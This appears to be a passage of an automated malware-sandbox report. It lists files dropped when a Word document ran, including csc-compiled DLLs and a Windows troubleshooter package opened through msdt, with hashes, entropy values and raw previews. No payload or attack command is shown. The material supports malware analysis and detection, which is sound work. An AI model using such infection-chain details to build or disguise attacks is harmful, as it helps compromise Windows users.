                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                            Entropy (8bit):3.7842633410808206
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:6WoPhmKraYZkH8KTibUyWkwjj0JwUC+CFSlwYgc1ul8a3Qq:MDaAkHHoQk89GCuQaK
                                                                                                                                                                            MD5:1A1C9639F1DF5ED946762D32605AF368
                                                                                                                                                                            SHA1:C2A5DEC29F78351F6AEA23CBDC071A7EE7F2E24C
                                                                                                                                                                            SHA-256:E73033B25389F7D790541E99D20FB367ACCDCA8C33C5F72F99FB6386A8ED4C3D
                                                                                                                                                                            SHA-512:EFD25EEB2F3D451EF79F6CDF3ADE12EF2AD00061577DF3B0C95C4CE4AF8FD3EF9387436122540E84AC500751C56A8BEE2DF62DB522A382823A0FDC2CDAD4C060
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.123708616746124
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFMak7YnqqmBPN5Dlq5J:+RI+ycuZhNEakSQPNnqX
                                                                                                                                                                            MD5:CC39D26B6C6008021BA8F3A7F51996B8
                                                                                                                                                                            SHA1:FF2BDE04559FA719536987EF732A12F7DD47FAC5
                                                                                                                                                                            SHA-256:AAE7C90A36B51CB6F30CFA6B97BAD94D507DBAB537BE0AEBC6335FDE5B5FB1AA
                                                                                                                                                                            SHA-512:71279E11194AF84A649A30B5993D3258F98F465433375D4DEC85470133F46997F0D202D39637001DF4C8CDD38776BE02AA958191E8A58213931E9A672378222D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                            Entropy (8bit):3.087676930087491
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:etGS49pz1qlkCe745Q7GslPorqjvX5ekjV4gztkZf4dy6Iv+hOBWI+ycuZhNEakA:6Mpqb927GslPlDRjyJ4dSk1ulEa3Iq
                                                                                                                                                                            MD5:121397484E96CF4E2E4F8A2C7B45EC73
                                                                                                                                                                            SHA1:15E9436EF6ABFC88CF8BC76D414B8F5876D113E0
                                                                                                                                                                            SHA-256:02E7755A19BD7D93776CCB15CCFE37699417D01E9A42FBE10C8109FE1BABACD9
                                                                                                                                                                            SHA-512:B5512381DED39698030AA5C69F5803928EAB8914C882B3E717329BC0F537E4FC04B7027FD99E24E09D1BCB005C41B973B85E6E13B22A8A1F632B05513BCA99A6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc1712.LNK

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:29:00 2022, mtime=Tue Jun 7 23:40:06 2022, atime=Tue Jun 7 23:39:52 2022, length=10142, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1050
                                                                                                                                                                            Entropy (8bit):4.697187741955964
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:8eygag39gNEmDB6sW8AjK6+mDy+939K7aB6m:8eyd49veW7jKLU939LB6
                                                                                                                                                                            MD5:D496A09DA9D6082EC540DA5331C394DE
                                                                                                                                                                            SHA1:3D201847125BF5C626D6E453767F8E2986F395F8
                                                                                                                                                                            SHA-256:9B079D289EE729F65BC3C2C7920F6FA8E087EBAF10D0F04B9C907D065F213704
                                                                                                                                                                            SHA-512:605F0EFCC085F5B0513A464904632260644FF4838597FFF163C6556AC91E2E4BC6D28553FF83A8B205421524B7B5DACE060CF2C3881D7B78D3716E87B6FE27B9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L..................F.... ........3..x.\L.z.....D.z...'...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T.......S........................a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T.......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..'...T.. .DOC171~1.DOC..J......hT...T................................d.o.c.1.7.1.2...d.o.c.x.......S...............-.......R...........>.S......C:\Users\user\Desktop\doc1712.docx..#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.1.7.1.2...d.o.c.x.........:..,.LB.)...Aw...`.......X.......642294...........!a..%.H.VZAj......s.........W...!a..%.H.VZAj......s.........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..p

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                            Entropy (8bit):4.597075278863427
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:bDuMJlZVUNzCmxWKVUNzCv:bCSVUDUy
                                                                                                                                                                            MD5:2E496A3F1C20211051285A980DADA39A
                                                                                                                                                                            SHA1:B980277016A7BCCC0E108CD9A00E82AF61433394
                                                                                                                                                                            SHA-256:B466FF5520F73BD086D77160EB4D437F0AA73747604E1318E3BF3C220D218763
                                                                                                                                                                            SHA-512:3104FE77ABF38AC191DC43C0BC437017B1A07804238503A6F8D2A3762F48E96E687BF0EB98FEF36E9FFC3451820E6D54BB00AE01B789779CDD10AAE61302E547
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..doc1712.LNK=0..[misc]..doc1712.LNK=0..

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):1.8075487029643305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdRI1//Il8QrlGalRhlXln:RtZM282lZP
                                                                                                                                                                            MD5:F8B1A6B462404EC70AB8DC7593348BC3
                                                                                                                                                                            SHA1:202E676B35E0CBE22B837B698E7ADDB8AD84CC7C
                                                                                                                                                                            SHA-256:80E3252D8EB31F7D1428825C208817CFCA9A8CC873902E783BE2E7E9D6FCA718
                                                                                                                                                                            SHA-512:95C8317D137E7545E010E1F231DFE6665F73471F36DE25935DBAC3EE88A5F9C8C97495D18F8C221161478CD8498D6CB7EA024F9EF7DE46C56184AA6C8B8B5F6F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........j.Z.=..................................................|.u..t......................

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                            Entropy (8bit):2.8954618442383215
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                            MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                            SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                            SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                            SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                            C:\Users\user\Desktop\~$oc1712.docx

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):1.8075487029643305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdRI1//Il8QrlGalRhlXln:RtZM282lZP
                                                                                                                                                                            MD5:F8B1A6B462404EC70AB8DC7593348BC3
                                                                                                                                                                            SHA1:202E676B35E0CBE22B837B698E7ADDB8AD84CC7C
                                                                                                                                                                            SHA-256:80E3252D8EB31F7D1428825C208817CFCA9A8CC873902E783BE2E7E9D6FCA718
                                                                                                                                                                            SHA-512:95C8317D137E7545E010E1F231DFE6665F73471F36DE25935DBAC3EE88A5F9C8C97495D18F8C221161478CD8498D6CB7EA024F9EF7DE46C56184AA6C8B8B5F6F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........j.Z.=..................................................|.u..t......................

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.diagpkg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\CL_LocalizationData.psd1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\result\results.xsl

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                            Malicious:false
